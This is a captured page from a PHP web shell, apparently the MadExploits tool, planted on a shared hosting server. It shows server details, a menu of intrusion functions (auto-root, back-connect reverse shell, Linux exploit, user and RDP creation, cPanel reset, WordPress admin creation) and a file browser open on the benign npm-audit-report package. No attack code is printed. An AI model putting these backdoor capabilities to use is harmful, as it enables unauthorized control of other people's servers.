Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.141.31.178
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
npm-audit-report /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
reporters
[ DIR ]
drwxr-xr-x
CHANGELOG.md
3.07
KB
-rw-r--r--
LICENSE
755
B
-rw-r--r--
README.md
1.5
KB
-rw-r--r--
index.js
588
B
-rw-r--r--
package.json
1.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict' const reporters = { install: require('./reporters/install'), parseable: require('./reporters/parseable'), detail: require('./reporters/detail'), json: require('./reporters/json'), quiet: require('./reporters/quiet') } const report = function (data, options) { const defaults = { reporter: 'install', withColor: true, withUnicode: true } const config = Object.assign({}, defaults, options) return new Promise((resolve) => { const result = reporters[config.reporter](data, config) return resolve(result) }) } module.exports = report
Close